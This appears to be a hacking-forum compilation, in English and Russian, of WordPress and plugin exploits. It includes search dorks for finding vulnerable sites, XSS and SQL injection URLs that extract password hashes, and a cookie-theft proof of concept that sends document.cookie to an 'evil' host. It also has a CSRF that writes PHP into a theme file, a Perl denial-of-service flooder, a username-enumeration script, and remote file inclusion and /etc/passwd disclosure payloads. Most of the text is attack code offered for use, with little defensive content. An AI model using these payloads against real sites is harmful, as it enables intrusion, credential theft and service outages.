Vulnerabilities: Wordpress Multiple Versions Pwnpress Exploitation Tookit (0.2pub) Wordpress plugin myflash <= 1.00 (wppath) RFI Vulnerability Enigma 2 WordPress Bridge (boarddir) Remote File Include Vulnerability 1.4* Wordpress plugin wordTube <= 1.43 (wpPATH) RFI Vulnerability Wordpress plugin wp-Table <= 1.43 (inc_dir) RFI Vulnerability Wordpress Plugin myGallery <= 1.4b4 Remote File Inclusion Vulnerability 1.5.1.* Wordpress <= 1.5.1.3 Remote Code Execution eXploit (metasploit) Wordpress <= 1.5.1.3 Remote Code Execution 0-Day Exploit Wordpress <= 1.5.1.2 xmlrpc Interface SQL Injection Exploit WordPress <= 1.5.1.1 SQL Injection Exploit WordPress <= 1.5.1.1 "add new admin" SQL Injection Exploit 2.0.* WordPress <= 2.0.2 (cache) Remote Shell Injection Exploit Wordpress <= 2.0.6 wp-trackback.php Remote SQL Injection Exploit Wordpress 2.0.5 Trackback UTF-7 Remote SQL Injection Exploit 2.1.* Wordpress 2.1.2 (xmlrpc) Remote SQL Injection Exploit Wordpress 2.1.3 admin-ajax.php SQL Injection Blind Fishing Exploit 2.* Wordpress <= 2.x dictionnary & Bruteforce attack WordPress 2.2 (wp-app.php) Arbitrary File Upload Exploit Wordpress 2.2 (xmlrpc.php) Remote SQL Injection Exploit dork: Code: "is proudly powered by WordPress" intext:"Warning: main" inurl:Wp ext:php inurl:wp-login.php Register Username Password -echo -trac inurl:"wp-admin" config -cvs -phpxref inurl:/comments/feed/rss2/ intext:wordpress.org?v=* Powered by Wordpress 1.2 intext:"proudly powered by WordPress" filetype:php intext:"powered by WordPress" filetype:php -dritte-seite intitle:"WordPress > * > Login form" inurl:"wp-login.php" ext:php inurl:"wp-login.php" -cvs Full path disclosure: WordPress < 1.5.2 Cross-site Scripting: /wp-login.php?action=login&redirect_to=[XSS] /wp-admin/templates.php?file=[XSS] /wp-admin/post.php?content=[XSS] http://www.example.com/wp-admin/edit-comments.php?s=[XSS] http://www.example.com/wp-admin/edit-comments.php?s=bla&submit=Search&mode=[XSS] http://www.example.com/wp-admin/templates.php?file=[XSS] http://www.example.com/wp-admin/link-add.php?linkurl=[XSS] http://www.example.com/wp-admin/link-add.php?name=[XSS] http://www.example.com/wp-admin/link-categories.php?cat_id=[XSS]&action=Edit http://www.example.com/wp-admin/link-manager.php?order_by=[XSS] http://www.example.com/wp-admin/link-manager.php?cat_id=[XSS] http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_url=[XSS] http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_name=[XSS] http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_description=[XSS] http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_rel=[XSS] http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_image=[XSS] http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_rss_uri=[XSS] http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_notes=[XSS] http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_id=[XSS] http://www.example.com/wp-admin/link-manager.php?action=linkedit&order_by=[XSS] http://www.example.com/wp-admin/link-manager.php?action=linkedit&cat_id=[XSS] http://www.example.com/wp-admin/post.php?content=[XSS] http://www.example.com/wp-admin/moderation.php?action=update&item_approved=[XSS] SQL injection examples: http://www.example.com/index.php?m=[SQL] http://www.example.com/wp-admin/edit.php?m=[SQL] http://www.example.com/wp-admin/link-categories.php?cat_id=[SQL]&action=Edit http://www.example.com/index.php?cat=100)%09or%090=0%09or%09(0=1 Tables/Prefix_/Columns: wp_ Hash algorithms: md5(password) WordPress Vulnerability Scanner Code: $ perl -x wp-scanner.pl http://testblog/wordpress/ WordPress Scanner starting: David Kierznowski (http://michaeldaw.org) Using plugins dir: wp-content/plugins [*] Initial WordPress Enumeration [*] Finding WordPress Major Version [*] Testing WordPress Template for XSS WordPress Basic Results wp-commentsrss2.php => Version Leak: WordPress 2.1.3 wp-links-opml.php => Version Leak: WordPress 2.1.3 wp-major-ver => Version 2.1 wp-rdf.php => Version Leak: WordPress 2.1.3 wp-rss.php => Version Leak: WordPress 2.1.3 wp-rss2.php => Version Leak: WordPress 2.1.3 wp-server => Apache/1.3.34 (Unix) PHP/4.4.4 mod_ssl/2.8.25 OpenSSL/0.9.8a wp-style-dir => http://testblog/wordpress/wp-content/themes/time1-theme-10/style.css wp-title => Test Blog wp-version => WordPress 2.1.3 x-Pingback => http://testblog/wordpress/xmlrpc.php WordPress Plugins Found wp-plugins[0] => Akismet Download
WordPress Scanner v1.3b BETA http://blogsecurity.net/cgi-bin/wp-scanner.cgi http://blogsecurity.net/projects/wp-scanner.zip
WordPress <=2.0.4 XSS simple PoC: HTML: <html> <head></head> <body> <form method="post" action="http://target/wordpress/wp-register.php" > <input type="hidden" name="action" value="register" /> <input type="hidden" name="user_login" id="user_login" value='"><script>alert(1)</script>' /> <input type="hidden" name="user_email" id="user_email" value='"><script>alert(2)</script>' /> </form> <script>document.forms[0].submit()</script> </body> </html> cookie theft PoC: HTML: <html> <head></head> <body> <form method="post" action="http://target/wordpress/wp-register.php#location='http://evil/?'+document.cookie" > <input type="hidden" name="action" value="register" /> <input type="hidden" name="user_login" id="user_login" value="anyusername" /> <input type="hidden" name="user_email" id="user_email" value='"><script>eval(location.hash.substr(1))</script>' /> </form> <script>document.forms[0].submit()</script> </body> </html> unrestricted script insertion from third-party site (we prove we can inject ANY JS): HTML: <html> <head></head> <body> <form method="post" action="http://victim/wordpress/wp-register.php" > <input type="hidden" name="action" value="register" /> <input type="hidden" name="user_login" id="user_login" value="test" /> <input type="hidden" name="user_email" id="user_email" value='"><SCRIPT src=http://evil/jsfile></SCRIPT>'> </form> <script>document.forms[0].submit()</script> </body> </html>
07 июня, 2007 Программа: WordPress 2.2, возможно более ранние версии Опасность: Средняя Наличие эксплоита: Да Описание: Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в методе "wp.suggestCategories" в сценарии xmlrpc.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Для выполнения этого нужно что была разрешена регистрация на сайте, отправляется запрос только POST Вот пример запроса HTML: <methodCall> <methodName>wp.suggestCategories</methodName> <params> <param><value>1</value></param> <param><value>Здесь логин</value></param> <param><value>Сдесь пароль</value></param> <param><value>1</value></param> <param><value>0 UNION SELECT USER()</value></param> </params> </methodCall>
Wordpress 2.2 Username Enumeration PHP: #!/bin/bash # this script attacks a low-risk username enumeration vul # on Wordpress 2.2 login page. Previous versions are # possibly affected as well # # Note: you need curl [http://curl.haxx.se/download.html] # installed on your system for this script to work. # # Adrian Pastor - http://www.gnucitizen.org/ if [ $# -ne 2 ] then echo "need to parameters! correct syntax is:" echo "$0 <ip-or-hostname> <wordlist-filename>" exit 1 fi for U in `cat $2` do #echo $U if curl -s -d "log=$U&pwd=mypassword&wp-submit=Login+%C2%BB&redirect_to=" --url "http://$1/wordpress/wp-login.php" | grep -i 'Incorrect password' > /dev/null then echo "username found!: $U" # print username found on screen echo $U >> $0.found # save results to file equals to script name plus .found extension fi done
WordPress Security Whitepaper http://blogsecurity.net/projects/secure-wp-whitepaper.pdf && Writing Secure WordPress Plugins http://michaeldaw.org/papers/securing_wp_plugins/
WordPress PHP_Self Cross-Site Scripting Vulnerability Code: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es" lang="es"> <head> <title>Wordpress XSS PoC</title> </head> <body id="main"> <form action="http://localhost/wp/wp-admin/theme-editor.php/'><img src=a onerror=document.forms[0].submit()><.php" method="post"> <p> <textarea name="newcontent" rows="8" cols="40"><?php echo "Owned! " . date('F d, Y'); ?></textarea> </p> <p> <input type="hidden" name="action" value="update" /> <input type="hidden" name="file" value="wp-content/themes/default/index.php" /> </p> </form> <script type="text/javascript"> // <![CDATA[ document.forms[0].submit(); // ]]> </script> </body> </html> Vulnerable URI: Code: /wp-admin/plugins.php?page=akismet-key-config Vulnerable Post variable: Code: _wp_http_referer="'%2522><script>eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41))</script>" by 0x000000
runPHP Plugin /wp-admin/post.php?action=edit&post=1/*SQLINJECTION*/%20AND%201′=0 WP <2.3 http://target/wp-admin/edit-post-rows.php?posts_columns[]=<script>alert(1)</script> WordPress 2.0.1 Remote DoS Exploit Code: #!perl #Greets to all omega-team members + h4cky0u[h4cky0u.org], lessMX6 and all dudes from #DevilDev ;) #The exploit was tested on 10 machines but not all got flooded.Only 6/10 got crashed use Socket; if (@ARGV < 2) { &usage; } $rand=rand(10); $host = $ARGV[0]; $dir = $ARGV[1]; $host =~ s/(http:\/\/)//eg; #no http:// for ($i=0; $i<9999999999999999999999999999999999999999999999999999999999999999999999; $i++) #0_o :) { $user="\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x66\x6f\x6f".$rand.$i; #you N33d t0 be l33t t0 s33 th!S ! $data = "action=register&user_login=$user&user_email=$user\@matrix.org&submit=Register+%C2%BB"; $len = length $data; $foo = "POST ".$dir."wp-register.php HTTP/1.1\r\n". "Accept: */*\r\n". "Accept-Language: en-gb\r\n". "Content-Type: application/x-www-form-urlencoded\r\n". "Accept-Encoding: gzip, deflate\r\n". "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n". "Host: $host\r\n". "Content-Length: $len\r\n". "Connection: Keep-Alive\r\n". "Cache-Control: no-cache\r\n\r\n". "$data"; my $port = "80"; my $proto = getprotobyname('tcp'); socket(SOCKET, PF_INET, SOCK_STREAM, $proto); connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo; send(SOCKET,"$foo", 0); syswrite STDOUT, "+"; } #s33 if the server is down print "\n\n"; system('ping $host'); sub usage { print "\n\t(W)ordpress 2.0.1 (R)emote (D)oS (E)xploit (B)y matrix_killer\n"; print "\te-mail: matrix_k\@abv.bg\n"; print "\tusage: \n"; print "\t$0 <host> </dir/>\n"; print "\tex: $0 127.0.0.1 /wordpress/\n"; print "\tex2: $0 127.0.0.1 / (if there isn't a dir)\n"; exit(); };
WordPress Plugin BackUpWordPress <= 0.4.2b RFI Vulnerability Code: #Author: S.W.A.T. #cont@ct: [email protected] -------------------------------------------------------------------------------- ------------------------- ------------------------------------------------------- Application : BackUpWordPress 0.4.2b Download : http://wordpress.designpraxis.at/download/backupwordpress.zip -------------------------------------------------------------------------------- Vuln : require_once $GLOBALS['bkpwp_plugin_path']."PEAR.php"; -------------------------------------------------------------------------------- Exploit: http://[target]/_path]/plugins/BackUp/Archive.php?bkpwp_plugin_path=Shl3? http://[target]/_path]/plugins/BackUp/Archive/Predicate.php?bkpwp_plugin_path=Shl3? http://[target]/_path]/plugins/BackUp/Archive/Writer.php?bkpwp_plugin_path=Shl3? http://[target]/_path]/plugins/BackUp/Archive/Reader.php?bkpwp_plugin_path=Shl3? & other Files & Folders In The [Archive] Folder -------------------------------------------------------------------------------- Dork: "inurl:/plugins/BackUp" Mirror: http://www.milw0rm.com/exploits/4593
Sql Injection in wordpress 2.3.1 Sql Injection in wordpress 2.3.1 Code: Author : Beenu Arora Mail : beenudel1986 (at) gmail (dot) com [email concealed] Application : WordPress (2.3.1) Homepage: http://wordpress.org/ ~~~~~~~~~~~~~~~~~~SQL Injection ~~~~~~~~~~~~ Vulnerable URL : http://localhost/path_to_wordpress/?feed=rss2&p= Parameter : P POC = http://localhost/path_to_wordpress/?feed=rss2&p=11/**/union/**/select/** /concat(user_password,char(100),username),2/**/from/**/wp_users/**/where /**/user_id=1/* Code: http://www.securityfocus.com/archive/1/484608
WordPress Charset SQL Injection Vulnerability WordPress Charset SQL Injection Vulnerability Недостаточная фильтрация при GBK-кодировке базы приводит к SQL-injection. ( Статья описания уязвимости на Античате: https://forum.antichat.ru/thread62109.html ) Exploit: http://localhost/wordpress/index.php?exact=1&sentence=1&s=%b3%27)))/**/AND/**/ID=-1/**/UNION/**/SELECT/**/1,2,3,4,5,user_pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/FROM/**/wp_users%23 _http://ilia.ws/archives/103-mysql_real_escape_string- versus-Prepared-Statements.html Code: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 === WordPress Charset SQL Injection Vulnerability === Release date: 2007-12-10 Last modified: 2007-12-10 Source: Abel Cheung Affected version: WordPress escape($gpc); } Finally, escape() method belongs to wp-includes/wp-db.php: function escape($string) { return addslashes( $string ); // Disable rest for now, causing problems ...... } 3. Proof of concept a. After WordPress installation, modify wp-config.php to make sure it uses certain character set for database connection (Big5 can also be used): define('DB_CHARSET', 'GBK'); b. http://localhost/wordpress/index.php?exact=1&sentence=1&s=%b3%27)))/**/AND/**/ID=-1/**/UNION/**/SELECT/**/1,2,3,4,5,user_pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/FROM/**/wp_users%23 4. Workaround Note: This vulnerability only exists for database queries performed using certain character sets. For databases created in most other character sets no remedy is needed. a. It is recommended to convert WordPress database to use character sets not vulnerable to such SQL exploit. One such charset is UTF-8, which does not use backslash ('\') as part of character and it supports various languages. b. Alternatively, edit WordPress theme to remove search capability. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) Comment: http://firegpg.tuxfamily.org iD8DBQFHXVXGQVLh8cZxhv8RAgjgAKDwvrrO6hJbnV0/VFah5W+i8grYcwCgzyCT 5RKJG+zo/mktmRU3v1IfmXE= =2okr -----END PGP SIGNATURE-----
Wordpress 2.3.1 - Broken Access Control is_admin() Получение админских привелегий в обход пароля. Как юзать: _http://forum.antichat.ru/showpost.php?p=729009&postcount=63 Code: By Michael Brooks Vulnerability:Broken Access Control Homepage:http://wordpress.org/download Software: Wordpress Version affected:2.3.1 (Latest at the time of writing) The impact of the flaw is that an attacker can read posts while they are still drafts. This is an ability that only the administrator should have. Imagine a stranger being able to read the news before it is published. Or perhaps a spam-blog harvesting posts before they are published. This flaw is because Wordpress is trusting the $_SERVER['REQUEST_URI'] global variable. Manipulation of $_SERVER['REQUEST_URI']has led to many xss flaws. Although an attacher shouldn't be able to control all $_SERVER variables, none of them should be trusted. exploit: htttp://localhost/wordpress/'wp-admin/ This will cause both $_SERVER['REQUEST_URI'] and $_SERVER['PHP_SELF'] to contain the value: htttp://localhost/wordpress/'wp-admin/ Vulnerable function: line 34, in ./wp-includes/query.php. function is_admin () { global $wp_query; return ($wp_query->is_admin || (stripos($_SERVER['REQUEST_URI'], 'wp-admin/') !== false)); } The same flaw is duplicted in again on line 645 of the same file. This url: htttp://localhost/wordpress/'wp-admin/ will cause the is_admin() function to return true. This flaw works regardless of register_globas or magic_quotes_gpc. The attack fails when search engine friendly urls are turned on in wordpress, however this option is turned off by default. Turning search engine friendly urls on is a workaround until a patch is created.
Wordpress Plugin PictPress <= release0.91 Remote File Disclosure Vulnerability Code: Wordpress Plugin PictPress <= release0.91 Remote File Disclosure Vulnerability D.Script : http://downloads.wordpress.org/plugin/pictpress.release-0.91.zip Vuln Code : In Line 5,6,7,8 : $path = $_GET['path']; $size = $_GET['size']; $base = dirname(__FILE__) . "/.."; $cache = "$base/cache/$size/$path"; In Line 22 : readfile($cache); POC : /wp-content/plugins/pictpress/resize.php?size=../../../../../../../../../../&path=/etc/passwd%00 # milw0rm.com [2007-12-05]
XSS in WP-ContactForm <= 2.0.7 For attacking admin only (at options page): 1 HTML: <html> <head> <title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title> </head> <!-- <body onLoad="document.hack.submit()"> --> <body> <form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post"> <input type="hidden" name="stage" value="process" /> <input type="hidden" name="wpcf_email" value='"><script>alert(document.cookie)</script>' /> </form> </body> </html> 2 HTML: <html> <head> <title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title> </head> <!-- <body onLoad="document.hack.submit()"> --> <body> <form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post"> <input type="hidden" name="stage" value="process" /> <input type="hidden" name="wpcf_subject" value='"><script>alert(document.cookie)</script>' /> </form> </body> </html> 3 HTML: <html> <head> <title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title> </head> <!-- <body onLoad="document.hack.submit()"> --> <body> <form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post"> <input type="hidden" name="stage" value="process" /> <input type="hidden" name="wpcf_question" value='"><script>alert(document.cookie)</script>' /> </form> </body> </html> 4 HTML: <html> <head> <title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title> </head> <!-- <body onLoad="document.hack.submit()"> --> <body> <form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post"> <input type="hidden" name="stage" value="process" /> <input type="hidden" name="wpcf_answer" value='"><script>alert(document.cookie)</script>' /> </form> </body> </html> ===== For attacking every user of the site (at contact page): 5 HTML: <html> <head> <title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title> </head> <!-- <body onLoad="document.hack.submit()"> --> <body> <form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post"> <input type="hidden" name="stage" value="process" /> <input type="hidden" name="wpcf_question" value="<script>alert(document.cookie)</script>" /> </form> </body> </html> HTML: <html> <head> <title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title> </head> <body> <iframe src="http://site/contact/" width="0" height="0"></iframe> </form> </body> </html> ====== For attacking every user of the site at contact page (and admin at options page): 6 HTML: <html> <head> <title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title> </head> <!-- <body onLoad="document.hack.submit()"> --> <body> <form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post"> <input type="hidden" name="stage" value="process" /> <input type="hidden" name="wpcf_success_msg" value="</textarea><script>alert(document.cookie)</script>" /> </form> </body> </html> 7 HTML: <html> <head> <title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title> </head> <!-- <body onLoad="document.hack.submit()"> --> <body> <form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post"> <input type="hidden" name="stage" value="process" /> <input type="hidden" name="wpcf_error_msg" value="</textarea><script>alert(document.cookie)</script>" /> </form> </body> </html> ====== For attacking every user of the site (at contact page): 8 HTML: <html> <head> <title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title> </head> <!-- <body onLoad="document.hack.submit()"> --> <body> <form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post"> <input type="hidden" name="stage" value="process" /> <input type="hidden" name="wpcf_answer" value="4" /> <input type="hidden" name="wpcf_success_msg" value="<script>alert(document.cookie)</script>" /> </form> </body> </html> HTML: <html> <head> <title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title> </head> <!-- <body onLoad="document.hack.submit()"> --> <body> <form name="hack" action="http://site/contact/" method="post"> <input type="hidden" name="wpcf_stage" value="process" /> <input type="hidden" name="wpcf_your_name" value="test" /> <input type="hidden" name="wpcf_email" value="[email protected]" /> <input type="hidden" name="wpcf_response" value="4" /> <input type="hidden" name="wpcf_msg" value="XSS" /> </form> </form> </body> </html> 9 HTML: <html> <head> <title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title> </head> <!-- <body onLoad="document.hack.submit()"> --> <body> <form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post"> <input type="hidden" name="stage" value="process" /> <input type="hidden" name="wpcf_error_msg" value="<script>alert(document.cookie)</script>" /> </form> </body> </html> HTML: <html> <head> <title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title> </head> <!-- <body onLoad="document.hack.submit()"> --> <body> <form name="hack" action="http://site/contact/" method="post"> <input type="hidden" name="wpcf_stage" value="process" /> <input type="hidden" name="wpcf_msg" value="XSS" /> </form> </form> </body> </html>
directory traversal vulnerabilities in WP 2.0.11(win only) PHP: function validate_file(..) if (false !== strpos($file, ‘./’)) Code: Proof of concept: http://site/wp-admin/index.php?page=\..\..\.htaccess
